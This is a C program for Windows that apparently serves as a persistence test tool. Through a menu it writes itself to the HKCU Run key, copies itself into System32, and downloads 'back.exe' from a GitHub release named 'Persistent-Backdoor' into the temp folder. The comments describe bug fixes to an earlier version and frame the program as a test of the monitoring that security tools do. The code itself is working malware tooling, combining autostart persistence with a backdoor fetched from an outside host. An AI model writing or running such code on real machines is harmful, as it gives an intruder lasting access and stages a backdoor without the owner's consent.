#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "urlmon.lib")
#define REG_KEY "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
#define REG_NAME "MyScript"
/* Print the menu of accepted commands to stdout (one line per command). */
void print_commands() {
    static const char *const menu[] = {
        "Possible commands:\n",
        "boot - create registry key to run the script on startup\n",
        "copy - copy the script to System32\n",
        "download - download a file from a URL defined in the script\n",
    };
    for (size_t i = 0; i < sizeof menu / sizeof menu[0]; i++) {
        fputs(menu[i], stdout);
    }
}
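/*
 * Register this executable's path as a REG_SZ value (REG_NAME) under the
 * HKCU Run key (REG_KEY) so it is started at logon. Reports the outcome on
 * stdout; no return value. This key is a well-known autostart location that
 * security tooling commonly monitors, which is presumably why the test
 * writes to it.
 *
 * Fixes vs. the original: the module path is validated before it is written
 * (a zero or truncated GetModuleFileName result was previously stored as-is),
 * and RegSetValueEx's result is checked so "Created" is only printed when
 * the value was actually written.
 */
void create_registry_key() {
    char path[MAX_PATH];
    unsigned long len = GetModuleFileName(NULL, path, MAX_PATH);
    /* 0 = failure; == MAX_PATH = truncated (buffer too small). */
    if (len == 0 || len >= MAX_PATH) {
        printf("Failed to create registry key.\n");
        return;
    }

    HKEY hkey;
    if (RegOpenKey(HKEY_CURRENT_USER, REG_KEY, &hkey) != ERROR_SUCCESS) {
        printf("Failed to create registry key.\n");
        return;
    }

    /* REG_SZ data must include the terminating NUL, hence len + 1. */
    long rc = RegSetValueEx(hkey, REG_NAME, 0, REG_SZ, (BYTE *)path, len + 1);
    RegCloseKey(hkey);
    if (rc == ERROR_SUCCESS) {
        printf("Created registry key to run the script on startup.\n");
    } else {
        printf("Failed to create registry key.\n");
    }
}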
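/*
 * Copy this executable into C:\Windows\System32 under its own file name.
 * CopyFile is called with bFailIfExists = FALSE, so an existing file of the
 * same name is overwritten; the copy only succeeds when the process has
 * write access to System32. Reports the outcome on stdout; no return value.
 *
 * Fixes vs. the original: GetModuleFileName is checked; strrchr is guarded
 * against a path without a backslash (the original added 1 to NULL); and the
 * destination is built with snprintf, with truncation treated as failure,
 * so a long file name can no longer overflow dest_path.
 */
void copy_to_system32() {
    char source_path[MAX_PATH];
    unsigned long len = GetModuleFileName(NULL, source_path, MAX_PATH);
    /* 0 = failure; == MAX_PATH = truncated (buffer too small). */
    if (len == 0 || len >= MAX_PATH) {
        printf("Failed to copy the script to System32.\n");
        return;
    }

    /* Base name after the last backslash; whole path if there is none. */
    const char *base = strrchr(source_path, '\\');
    base = base ? base + 1 : source_path;

    char dest_path[MAX_PATH];
    int n = snprintf(dest_path, sizeof dest_path, "C:\\Windows\\System32\\%s", base);
    if (n < 0 || (size_t)n >= sizeof dest_path) {
        /* Would have been a mangled destination path; refuse instead. */
        printf("Failed to copy the script to System32.\n");
        return;
    }

    if (CopyFile(source_path, dest_path, FALSE)) {
        printf("Copied the script to System32.\n");
    } else {
        printf("Failed to copy the script to System32.\n");
    }
}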
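/*
 * Download the URL hard-coded below into %TEMP%\file.txt using
 * URLDownloadToFile (urlmon) and report the outcome on stdout. No return
 * value. The destination name is fixed; the file is written even though the
 * program never executes or reads it.
 *
 * Fixes vs. the original: GetTempPath's result is checked (0 = failure,
 * >= MAX_PATH = buffer too small) and "file.txt" is only appended when it
 * fits, so the unbounded strcat can no longer run past dest_path.
 */
void download_file() {
    static const char url[] = "https://github.com/PolGs/Persistent-Backdoor/releases/download/0.12/back.exe";
    static const char suffix[] = "file.txt";
    char dest_path[MAX_PATH];

    unsigned long len = GetTempPath(MAX_PATH, dest_path);
    /* len excludes the NUL; sizeof suffix includes it. */
    if (len == 0 || len >= MAX_PATH || len + sizeof suffix > sizeof dest_path) {
        printf("Failed to download a file from a URL.\n");
        return;
    }
    /* GetTempPath returns a trailing backslash, so a plain append suffices. */
    memcpy(dest_path + len, suffix, sizeof suffix);

    if (URLDownloadToFile(NULL, url, dest_path, 0, NULL) == S_OK) {
        printf("Downloaded a file from a URL.\n");
    } else {
        printf("Failed to download a file from a URL.\n");
    }
}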
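/*
 * Interactive command loop: print the menu, read one line from stdin and
 * dispatch it to the matching handler. Returns 0 once stdin reaches EOF or
 * a read error occurs.
 *
 * Fixes vs. the original: fgets' result was ignored, so on EOF the stale
 * buffer was re-dispatched forever (re-running the last command in a tight
 * loop); the loop now exits instead. Lines longer than the buffer are
 * drained so their tail is not parsed as further commands.
 */
int main(void) {
    char input[256];
    for (;;) {
        print_commands();
        printf("Enter a command: ");
        fflush(stdout); /* prompt has no newline; make sure it is visible */

        if (fgets(input, sizeof input, stdin) == NULL) {
            break; /* EOF or read error: stop rather than spin */
        }
        if (strchr(input, '\n') == NULL) {
            /* Overlong line: discard the rest so it is not read as a command. */
            int c;
            while ((c = getchar()) != '\n' && c != EOF) {
            }
        }

        if (strcmp(input, "boot\n") == 0) {
            create_registry_key();
        } else if (strcmp(input, "copy\n") == 0) {
            copy_to_system32();
        } else if (strcmp(input, "download\n") == 0) {
            download_file();
        } else {
            printf("Invalid command.\n");
        }
    }
    return 0;
}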